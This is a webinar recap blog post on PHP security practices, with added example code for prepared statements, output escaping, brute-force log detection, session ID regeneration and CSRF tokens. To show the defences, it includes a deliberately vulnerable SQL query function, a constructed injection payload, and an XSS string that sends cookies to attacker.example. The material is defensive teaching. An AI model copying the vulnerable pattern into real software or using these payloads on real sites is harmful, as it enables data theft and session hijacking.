Webinar Recap: Web Security Best Practices for PHP
Every day, millions of pieces of sensitive data, both personal and business related, are processed by web applications. And every day, applications are at risk of being exposed to new PHP security threats that make that sensitive data vulnerable to attack. With the cost of data breaches averaging over $3.8M and mean time to identify attacks topping 190 days, it’s critical to ensure the security and compliance of your PHP applications and stacks.
Last week, Daryl Wood presented the first webinar in our series focused on the best practices every development team should follow to ensure the security of their web applications.
If you missed it, here’s your recap. If you attended, you might have missed a few nuggets. Either way, it’s worthwhile to share this post and the on-demand version with your colleagues interested in security.
Top Security Attack Types
An attack can have a significant impact on your business information and reputation. Attacks can lead to data loss, corruption, access denial, and account compromises, which can translate to bad publicity, lack of accountability, and in a worst-case scenario, litigation expenses. The top attacks and vulnerabilities to watch out for include:
- SQL injection
- Cross-site scripting (XSS)
- Broken session management
- Brute force
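The first two items on that list are the easiest to show in code. The following is an added example written for this recap, not code from the webinar or from Zend: the same user lookup written with string concatenation and then as a prepared statement, hit with a constructed injection payload, followed by output escaping against a constructed XSS comment. It uses an in-memory SQLite database (pdo_sqlite) so it runs offline from the PHP CLI.

```php
<?php
declare(strict_types=1);

// Added example: SQL injection and XSS, the vulnerable form beside the hardened form.
// In-memory SQLite keeps it self-contained; the two users are constructed demo rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
$pdo->exec("INSERT INTO users (username) VALUES ('alice'), ('bob')");

// VULNERABLE: the request value is pasted into the SQL text, so it can change the query.
function findUserVulnerable(PDO $pdo, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $username . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: a prepared statement sends the value separately from the SQL text;
// whatever the user types is compared as data and can never become syntax.
function findUserSafe(PDO $pdo, string $username): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the string literal and appends an always-true OR,
// so the vulnerable query matches every row instead of one user.
$payload = "nobody' OR '1'='1";
echo 'vulnerable query matched ', count(findUserVulnerable($pdo, $payload)), " row(s)\n";
echo 'prepared statement matched ', count(findUserSafe($pdo, $payload)), " row(s)\n";

// Cross-site scripting is an output problem: escape for the context the value lands in.
// This encoder is correct for HTML body text and for quoted attribute values; a value
// placed inside a <script> block or a URL needs a different encoder, not this one.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed stored-XSS comment that would ship the visitor's cookie to an attacker host.
$comment = '<script>location="https://attacker.example/?c="+document.cookie</script>';
echo '<p>' . $comment . "</p>\n";    // VULNERABLE: the script tag reaches the browser intact
echo '<p>' . e($comment) . "</p>\n"; // HARDENED: angle brackets and quotes become entities
```

Run it with `php` from the command line and compare the two row counts and the two paragraphs. The rule the two halves illustrate is the same: keep data out of the place where code is interpreted, whether that interpreter is the SQL engine or the browser.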
Preventing Security Attacks
Log monitoring is all about keeping an eye on what is being attacked, from where, and sometimes even by whom. Out of the box PHP does not write application errors to a log: log_errors has to be switched on in php.ini (and display_errors switched off, so that error details go to the log rather than to the visitor's browser). Enable it, because the many monitoring tools available in the market need those logs to work from.
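To make the logging point concrete, here is an added example for this recap, not code from the webinar or a Zend Server feature. It switches PHP's own error log on at runtime for cases where php.ini cannot be edited, writes application security events to a separate structured log, and then scans that log for the brute-force pattern from the attack list. The log file locations, the JSON-lines format and the sample events are all constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example: PHP error logging settings, a structured security event log,
// and a scan of that log for brute-force login attempts. Paths are assumptions.
ini_set('display_errors', '0');   // error text (paths, queries, traces) must not reach the browser
ini_set('log_errors', '1');       // ...but it must reach the log
ini_set('error_log', sys_get_temp_dir() . '/php-errors.log'); // assumed path; use a real log dir in production
error_reporting(E_ALL);

$securityLog = sys_get_temp_dir() . '/security-events.log';   // assumed path

/** Append one JSON line per event so a monitoring tool can parse it; never log passwords. */
function logSecurityEvent(string $logFile, string $event, array $context, ?int $time = null): void
{
    $record = ['ts' => gmdate('c', $time ?? time()), 'event' => $event] + $context;
    file_put_contents($logFile, json_encode($record, JSON_UNESCAPED_SLASHES) . PHP_EOL, FILE_APPEND | LOCK_EX);
}

/** Return the source IPs with at least $threshold failed logins inside any $window-second span. */
function findBruteForce(iterable $lines, int $threshold, int $window): array
{
    $failuresByIp = [];
    foreach ($lines as $line) {
        $r = json_decode(trim($line), true);
        if (!is_array($r) || ($r['event'] ?? null) !== 'login_failed' || !isset($r['ip'], $r['ts'])) {
            continue; // skip other events and malformed lines instead of aborting the scan
        }
        $failuresByIp[$r['ip']][] = strtotime($r['ts']);
    }
    $suspects = [];
    foreach ($failuresByIp as $ip => $times) {
        sort($times);
        // Sliding window: failure i and failure i+threshold-1 no more than $window seconds apart.
        for ($i = 0; $i + $threshold - 1 < count($times); $i++) {
            if ($times[$i + $threshold - 1] - $times[$i] <= $window) {
                $suspects[] = $ip;
                break;
            }
        }
    }
    return $suspects;
}

// Constructed events: 203.0.113.7 fails six times in 25 seconds (a password-guessing loop),
// 198.51.100.4 fails twice an hour apart with a success in between (a forgetful user).
@unlink($securityLog);
$t0 = strtotime('2024-01-01T00:00:00Z');
for ($i = 0; $i < 6; $i++) {
    logSecurityEvent($securityLog, 'login_failed', ['ip' => '203.0.113.7', 'user' => 'admin'], $t0 + 5 * $i);
}
logSecurityEvent($securityLog, 'login_failed', ['ip' => '198.51.100.4', 'user' => 'alice'], $t0);
logSecurityEvent($securityLog, 'login_ok',     ['ip' => '198.51.100.4', 'user' => 'alice'], $t0 + 30);
logSecurityEvent($securityLog, 'login_failed', ['ip' => '198.51.100.4', 'user' => 'alice'], $t0 + 3600);

// A PHP-level error goes to the error_log path configured above, not to the caller's screen.
trigger_error('demo warning written to the PHP error log', E_USER_WARNING);

$lines = file($securityLog, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
print_r(findBruteForce($lines, 5, 60));
```

The threshold and window are the knobs to tune per application; the point is that the detection only works if the login code emits the `login_failed` event in the first place, which is the habit the webinar is asking teams to build.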
It’s also important to be proactive in updating your PHP servers to the latest version. Being on a supported version ensures you receive bug and security fixes and that your system monitoring keeps working correctly. Older versions of PHP (5.6 and lower) are no longer supported by the community, so any newly discovered vulnerability in the runtime stays unpatched and your applications are at risk. Long-term support for PHP 5.6 applications is available through Zend Server until the end of 2020.
In the Zend/PHP environment, are there log monitoring tools or capabilities that we can use?
Yes, if you are referring to Zend Framework. Zend Framework has a component, Zend\Log, that handles logging, and zend-http that can handle notifications. Also worthy of note, Zend Framework is componentized. What that means is that you can use only these components in any application, regardless of technology stack, without the entire Zend Framework. There are also good third-party tools available, such as Monolog, which is available as a Composer package.
Does regeneration of session id in subsequent requests help with improvement of security and in what way?
Yes, as long as the old session is destroyed either via a call to session_destroy() or session_regenerate_id(true). Passing "true" to the latter ensures the old session is destroyed.
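The answer above is the whole defence against session fixation in one line, so here it is in context. This is an added example written for the recap, not the presenter's code: a login and logout flow that rotates the session ID whenever the privilege level changes, with the cookie flags set in the `session_start()` options. The user table and its password hash are constructed inside the script so that it runs stand-alone from the CLI; a real application reads them from its user store.

```php
<?php
declare(strict_types=1);

// Added example: session ID regeneration at login, periodic rotation, and a full logout.
session_start([
    'use_strict_mode' => true,     // refuse session IDs the server never issued
    'cookie_httponly' => true,     // keep the cookie out of document.cookie
    'cookie_secure'   => true,     // send the cookie over HTTPS only
    'cookie_samesite' => 'Strict', // PHP 7.3+; do not send it on cross-site requests
]);

// Constructed user table: username => [id, password hash]. The hash is computed here only
// so the example runs on its own; never hard-code credentials in real code.
$users = ['alice' => [1, password_hash('correct horse battery staple', PASSWORD_DEFAULT)]];

/** Returns the user id on success, null otherwise. Unknown users still pay for one verify. */
function verifyCredentials(array $users, string $username, string $password): ?int
{
    [$id, $hash] = $users[$username] ?? [null, password_hash('dummy', PASSWORD_DEFAULT)];
    return (password_verify($password, $hash) && $id !== null) ? $id : null;
}

function loginUser(int $userId): void
{
    // Regenerate BEFORE writing privileged data, so the data only ever lives under the new ID.
    // The true argument deletes the old session record. With false (or no call at all) an ID
    // an attacker planted before login would keep working and would now carry a logged-in
    // user, which is the session fixation attack in a nutshell.
    session_regenerate_id(true);
    $_SESSION = ['user_id' => $userId, 'rotated_at' => time()];
}

/** Call at the top of every authenticated action; rotates a long-lived ID every $maxAge seconds. */
function requireLogin(int $maxAge = 900): int
{
    if (!isset($_SESSION['user_id'])) {
        throw new RuntimeException('not logged in'); // the controller turns this into a redirect
    }
    if (time() - ($_SESSION['rotated_at'] ?? 0) > $maxAge) {
        session_regenerate_id(true);   // narrows the window in which a leaked ID stays useful
        $_SESSION['rotated_at'] = time();
    }
    return $_SESSION['user_id'];
}

function logoutUser(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        // Expire the cookie in the browser as well, not only the server-side record.
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Demo flow from the CLI: the ID issued before login must differ from the one after it.
$idBeforeLogin = session_id();
$userId = verifyCredentials($users, 'alice', 'correct horse battery staple');
if ($userId === null) {
    exit("login failed\n");
}
loginUser($userId);
echo 'session id rotated at login: ', ($idBeforeLogin !== session_id() ? 'yes' : 'no'), PHP_EOL;
echo 'authenticated as user ', requireLogin(), PHP_EOL;
logoutUser();
```

Two details matter more than they look: the regeneration happens before `$_SESSION` is populated, and `use_strict_mode` is on so that a browser presenting an unknown ID gets a fresh one rather than having the server adopt the attacker's choice.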
How would you encourage your team members to put some effort into improving security without "compromising" the current phase?
Put a policy in place and assign responsibility to do a periodic code audit and implementation. An option for this could be as simple as starting with an audit of all controller actions and how they handle input, or checking whether all web forms include cross-site request forgery tokens, and then just checking the forms.
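The "check the forms" audit has a concrete pass/fail criterion once every state-changing form carries a token that a cross-site page cannot know. The following is an added example for this recap, not the presenter's code: per-session CSRF token generation, the hidden field, and constant-time verification, exercised from the CLI with one legitimate submission and two constructed forged ones. The `handleTransfer` action is a stand-in for any of your own controller actions.

```php
<?php
declare(strict_types=1);

// Added example: CSRF tokens for state-changing forms. The handler and the POST arrays
// are constructed for the demo.
session_start(['use_strict_mode' => true, 'cookie_httponly' => true, 'cookie_samesite' => 'Strict']);

/** One cryptographically random token per session: 32 bytes, rendered as 64 hex characters. */
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** The hidden input every form that changes state must include. */
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

function csrfValid(array $post): bool
{
    $expected  = $_SESSION['csrf_token'] ?? null;
    $submitted = $post['csrf_token'] ?? null;
    // hash_equals compares in constant time. The is_string guards turn a crafted
    // csrf_token[]=x (an array) into a clean rejection instead of a type error.
    return is_string($expected) && is_string($submitted) && hash_equals($expected, $submitted);
}

/** A stand-in controller action; returns [http status, message]. */
function handleTransfer(array $post): array
{
    if (!csrfValid($post)) {
        return [403, 'rejected: missing or invalid CSRF token'];
    }
    // ...perform the state change for the logged-in user here...
    return [200, sprintf('ok: transfer of %s to %s accepted', $post['amount'] ?? '?', $post['to'] ?? '?')];
}

echo csrfField(), PHP_EOL; // what the template renders inside the <form>

// Constructed submissions: one from our own form, two from a page on another origin.
// The forged ones cannot read our session's token, so they guess or omit it.
$fromOurForm   = ['amount' => '100', 'to' => 'bob',     'csrf_token' => csrfToken()];
$forgedGuess   = ['amount' => '100', 'to' => 'mallory', 'csrf_token' => str_repeat('0', 64)];
$forgedMissing = ['amount' => '100', 'to' => 'mallory'];

foreach ([$fromOurForm, $forgedGuess, $forgedMissing] as $submission) {
    [$status, $message] = handleTransfer($submission);
    echo $status, ' ', $message, PHP_EOL;
}
```

A per-session token is the simplest scheme to audit for: grep every `<form method="post">` for `csrfField()` and every POST handler for `csrfValid()`. The SameSite cookie attribute set in `session_start()` is a second, independent layer, not a replacement; older browsers ignore it and some cross-site navigations still send cookies.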
What is the best tool in your opinion that can be used on Kali Linux to test the security of web applications?
That's a tough one. There are many. One to consider is sqlmap, which can, with command-line arguments, hammer an SQL server, exposing flaws.